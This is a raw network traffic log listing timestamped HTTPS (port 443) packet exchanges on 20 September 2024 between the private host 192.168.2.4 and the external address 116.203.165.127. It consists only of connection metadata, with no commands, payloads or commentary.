Sep 20, 2024 11:07:32.595161915 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:32.595171928 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:32.916070938 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:32.916140079 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:32.916534901 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:32.916955948 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:32.916976929 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:33.261979103 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:33.262082100 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:33.262104988 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:33.262152910 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:33.262160063 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:33.262212992 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:33.263238907 CEST	49743	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:33.263258934 CEST	443	49743	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:33.700320959 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:33.700459003 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:33.701001883 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:33.701018095 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:33.703717947 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:33.703727007 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.139638901 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.139674902 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.139683962 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.139725924 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.139755011 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.139770985 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.139777899 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.139800072 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.139825106 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.171236038 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.171266079 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.171427965 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.171451092 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.171504974 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.239902020 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.239933014 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.240015030 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.240053892 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.240099907 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.266134977 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.266161919 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.266309023 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.266330004 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.266434908 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.299817085 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.299844980 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.299941063 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.299957037 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.300008059 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.332847118 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.332875013 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.333007097 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.333024979 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.333081007 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.355189085 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.355221033 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.355367899 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.355393887 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.355446100 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.374054909 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.374080896 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.374301910 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.374316931 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.374444962 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.390595913 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.390620947 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.390710115 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.390726089 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.390775919 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.405342102 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.405365944 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.405452013 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.405467033 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.405510902 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.420177937 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.420200109 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.420273066 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.420284986 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.420327902 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.433214903 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.433247089 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.433294058 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.433304071 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.433332920 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.433347940 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.449418068 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.449441910 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.449578047 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.449593067 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.449676037 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.461190939 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.461234093 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.461416960 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.461431026 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.461602926 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.470062971 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.470125914 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.470144987 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.470164061 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.470186949 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.470206022 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.480015039 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.480040073 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.480089903 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.480103016 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.480129957 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.480148077 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.489428997 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.489453077 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.489531994 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.489542961 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.489581108 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.497481108 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.497503996 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.497550964 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.497560024 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.497585058 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.497600079 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.512662888 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.512682915 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.512856960 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.512866974 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.512906075 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.525861025 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.525882959 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.525932074 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.525938988 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.525970936 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.541910887 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.541934013 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.541980028 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.541986942 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.542007923 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.542023897 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.551811934 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.551831007 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.551959991 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.551966906 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.552062035 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.564186096 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.564207077 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.564368010 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.564376116 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.564488888 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.572753906 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.572774887 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.572849035 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.572859049 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.572880030 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.572895050 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.580506086 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.580527067 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.580607891 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.580622911 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.581058979 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.590061903 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.590086937 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.590135098 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.590142012 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.590173006 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.590198994 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.605415106 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.605438948 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.605493069 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.605504036 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.605528116 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.605555058 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.620755911 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.620779991 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.620831013 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.620837927 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.620865107 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.620893002 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.634931087 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.634967089 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.635018110 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.635027885 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.635056019 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.635094881 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.644263983 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.644294024 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.644359112 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.644386053 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.644402027 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.644442081 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.657237053 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.657258034 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.657326937 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.657377005 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.657394886 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.657444954 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.665540934 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.665585041 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.665623903 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.665632963 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.665654898 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.665679932 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.673978090 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.674021959 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.674119949 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.674128056 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.674171925 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.674182892 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.685430050 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.685489893 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.685525894 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.685539007 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.685548067 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.685585022 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.697921991 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.697967052 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.698012114 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.698044062 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.698071957 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.698134899 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.713730097 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.713782072 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.713848114 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.713886023 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.713968039 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.713968039 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.727268934 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.727312088 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.727430105 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.727430105 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.727485895 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.727590084 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.737122059 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.737164021 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.737227917 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.737251997 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.737261057 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.737303019 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.750029087 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.750073910 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.750122070 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.750130892 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.750139952 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.750174999 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.758107901 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.758130074 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.758203030 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.758220911 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.758723974 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.765747070 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.765788078 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.765830040 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.765857935 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.765866041 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.766272068 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.777430058 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.777473927 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.777522087 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.777534008 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.777549028 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.777581930 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.790852070 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.790911913 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.790956020 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.790965080 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.790981054 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.791008949 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.806066036 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.806129932 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.806170940 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.806184053 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.806195974 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.806224108 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.819833040 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.819888115 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.820046902 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.820072889 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.820117950 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.829658985 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.829701900 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.829773903 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.829799891 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.829807043 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.829900980 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.842813969 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.842835903 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.842926979 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.842952013 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.843014002 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.850742102 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.850764036 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.850852013 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.850871086 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.850913048 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.858361959 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.858385086 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.858462095 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.858473063 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.858541965 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.872306108 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.872339010 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.872411013 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.872436047 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.872442961 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.872497082 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.888816118 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.888839960 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.888906002 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.888917923 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.888926029 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.888958931 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.898822069 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.898844957 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.898927927 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.898941040 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.898987055 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.912610054 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.912631035 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.912862062 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.912885904 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.912945032 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.922801971 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.922827005 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.923028946 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.923049927 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.923161030 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.935597897 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.935617924 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.935734987 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.935762882 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.935951948 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.943438053 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.943459988 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.943505049 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.943525076 CEST	443	49744	116.203.165.127	192.168.2.4
Sep 20, 2024 11:07:34.943553925 CEST	49744	443	192.168.2.4	116.203.165.127
Sep 20, 2024 11:07:34.943578005 CEST	49744	443	192.168.2.4	116.203.165.127
